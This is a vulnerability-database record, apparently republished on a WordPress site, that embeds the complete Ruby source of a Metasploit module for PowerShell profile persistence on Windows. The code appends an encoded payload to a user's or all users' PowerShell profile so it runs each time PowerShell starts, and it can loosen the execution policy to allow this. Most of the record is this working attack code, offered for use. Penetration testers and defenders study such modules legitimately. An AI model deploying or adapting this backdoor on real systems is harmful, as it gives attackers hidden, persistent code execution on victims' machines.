{“lastseen”:”2026-04-15T19:28:04″,”description”:”This module establishes persistence by modifying a PowerShell profile script, which is automatically executed when PowerShell starts. The module supports multiple profile scopes current user or all users and safely backs up any existing profile prior…”,”published”:”2026-04-15T19:02:24″,”modified”:”2026-04-15T19:02:24″,”type”:”metasploit”,”title”:”Powershell Profile Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-PERSISTENCE-POWERSHELL_PROFILE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Exploit::Powershell\\n include Msf::Post::Windows::Registry\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Powershell Profile Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module establishes persistence by modifying a PowerShell profile script, which is automatically\\n executed when PowerShell starts. The module supports multiple profile scopes (current user or all users)\\n and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘madefourit’\\n ],\\n ‘Platform’ =\\u003e [ ‘win’ ],\\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_X86],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’ ],\\n ‘Targets’ =\\u003e [[ ‘Auto’, {} ]],\\n ‘References’ =\\u003e [\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE],\\n [ ‘URL’, ‘https:\/\/pentestlab.blog\/2019\/11\/05\/persistence-powershell-profile\/’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2019-11-05’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n register_options [\\n OptEnum.new(‘PROFILE’, [true, ‘The powershell profile to target.’, ‘AUTO’, [‘AUTO’, ‘ALLUSERSALLHOSTS’, ‘ALLUSERSCURRENTHOST’, ‘CURRENTUSERALLHOSTS’, ‘CURRENTUSERCURRENTHOST’]]),\\n OptBool.new(‘CREATE’, [false, ‘If a profile file doesnt exist, create one.’, false]),\\n OptBool.new(‘EXECUTIONPOLICY’, [false, ‘Attempt to update execution policy to execute .’, true]),\\n ]\\n end\\n\\n def policy_allows_execution?\\n # Get-ExecutionPolicy -List has words, but when converting to json to read easily it gives numbers, so we have to map them back\\n execution_policies = cmd_exec(‘powershell -NoProfile -Command \\”$h = @{}; Get-ExecutionPolicy -List | ForEach-Object { $h[$_.Scope.ToString()] = $_.ExecutionPolicy.ToString() }; $h | ConvertTo-Json\\”‘)\\n begin\\n @policies = JSON.parse(execution_policies)\\n rescue JSON::ParserError\\n print_error(\\”Failed to parse powershell execution policies: #{execution_policies}\\”)\\n return false\\n end\\n [‘Unrestricted’, ‘RemoteSigned’, ‘Bypass’].include?(@policies[‘CurrentUser’])\\n end\\n\\n def check\\n return Msf::Exploit::CheckCode::Safe(‘System does not have powershell’) unless registry_enumkeys(‘HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft’).include?(‘PowerShell’)\\n\\n unless policy_allows_execution?\\n if datastore[‘EXECUTIONPOLICY’]\\n return Msf::Exploit::CheckCode::Appears(\\”Powershell execution policy for CurrentUser (#{@policies[‘CurrentUser’]}), will attempt to override\\”)\\n else\\n return Msf::Exploit::CheckCode::Safe(\\”Powershell execution policy for CurrentUser (#{@policies[‘CurrentUser’]}) doesn’t allow script execution, try setting EXECUTIONPOLICY\\”)\\n end\\n end\\n vprint_status(\\”Powershell execution policy for CurrentUser (#{@policies[‘CurrentUser’]})\\”)\\n\\n CheckCode::Appears(‘Powershell is installed and exploitable on the target system’)\\n end\\n\\n def backdoor_profile(profile_file)\\n module_created_file = false\\n unless file?(profile_file)\\n if datastore[‘CREATE’]\\n print_status(\\”#{profile_file} does not exist, creating it…\\”)\\n folders = profile_file.split(‘\\\\\\\\’)[0..-2]\\n folders = folders.join(‘\\\\\\\\’)\\n # we can’t use mkdir here because register_dir_for_cleanup gets called, and we handle our own cleanups\\n unless directory?(folders)\\n cmd_exec(\\”cmd \/c \\\\\\”md #{folders}\\\\\\”\\”)\\n @clean_up_rc \\u003c\\u003c \\”rmdir #{folders.gsub(‘\\\\\\\\’, ‘\/’)}\\\\n\\”\\n end\\n unless write_file(profile_file, ”) # write empty file so we can append later\\n print_error(\\”Failed to create profile file at #{profile_file}\\”)\\n return false\\n end\\n module_created_file = true\\n else\\n print_error(\\”#{profile_file} does not exist and CREATE option is false\\”)\\n return false\\n end\\n end\\n\\n if module_created_file\\n @clean_up_rc \\u003c\\u003c \\”rm #{profile_file.gsub(‘\\\\\\\\’, ‘\/’)}\\\\n\\”\\n else\\n pfile = read_file(profile_file)\\n if pfile.nil?\\n vprint_warning(\\”Unable to read (and backup) existing profile file at #{profile_file}, continuing without backup\\”)\\n else\\n backup_file = store_loot(\\n ‘powershell.profile’,\\n ‘text\/plain’,\\n session,\\n pfile, profile_file.split(‘\\\\\\\\’).last,\\n ‘powershell profile backup’\\n )\\n\\n print_status(\\”Created #{profile_file} backup: #{backup_file}\\”)\\n @clean_up_rc \\u003c\\u003c \\”upload #{backup_file} #{profile_file}\\\\n\\”\\n end\\n end\\n\\n pload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)\\n splitter = ‘-c ‘\\n pload = pload.split(splitter)[1..] # remove all the powershell.exe and setup\/run stuff, we only need the code bit here\\n pload = pload.join(splitter)[1..-2] # rejoin, then remove surrounding double quotes\\n\\n vprint_status(\\”Appending payload to #{profile_file}\\”)\\n unless append_file(profile_file, \\”\\\\n#{pload}\\\\n\\”)\\n print_error(\\”Failed to append payload to #{profile_file}\\”)\\n return false\\n end\\n true\\n end\\n\\n def install_persistence\\n profiles = cmd_exec(‘powershell -NoProfile -Command \\”$PROFILE | Select-Object * | ConvertTo-Json\\”‘)\\n begin\\n profiles = JSON.parse(profiles)\\n rescue JSON::ParserError\\n fail_with(Failure::UnexpectedReply, \\”Failed to parse powershell profile paths: #{profiles}\\”)\\n end\\n profiles = profiles.transform_keys { |k| k.to_s.upcase }\\n\\n if !policy_allows_execution? \\u0026\\u0026 datastore[‘EXECUTIONPOLICY’]\\n print_status(‘Updating Powershell execution policy for CurrentUser to RemoteSigned’)\\n cmd_exec(‘powershell -NoProfile -Command \\”Set-ExecutionPolicy -Scope CurrentUser RemoteSigned\\”‘)\\n @clean_up_rc \\u003c\\u003c \\”execute -f powershell -a \\\\\\”-NoProfile -w hidden -Command ‘Set-ExecutionPolicy -Scope CurrentUser #{@policies[‘CurrentUser’]}’\\\\\\”\\\\n\\”\\n end\\n\\n case datastore[‘PROFILE’]\\n when ‘AUTO’\\n [‘ALLUSERSALLHOSTS’, ‘ALLUSERSCURRENTHOST’, ‘CURRENTUSERALLHOSTS’, ‘CURRENTUSERCURRENTHOST’].each do |profile|\\n unless profiles.key?(profile)\\n print_error(\\”#{profile} not found in user’s profiles\\”)\\n next\\n end\\n success = backdoor_profile(profiles[profile])\\n break if success\\n end\\n when ‘ALLUSERSALLHOSTS’, ‘ALLUSERSCURRENTHOST’, ‘CURRENTUSERALLHOSTS’, ‘CURRENTUSERCURRENTHOST’\\n unless profiles.key?(datastore[‘PROFILE’])\\n fail_with(Failure::UnexpectedReply, \\”#{datastore[‘PROFILE’]} not found in user’s profiles\\”)\\n end\\n backdoor_profile(profiles[datastore[‘PROFILE’]])\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/persistence\/powershell_profile.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/persistence\/powershell_profile\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-15T19:28:04″,”description”:”This module establishes persistence by modifying a PowerShell profile script, which is automatically executed when PowerShell starts. The module supports multiple profile scopes current user…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-47292","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n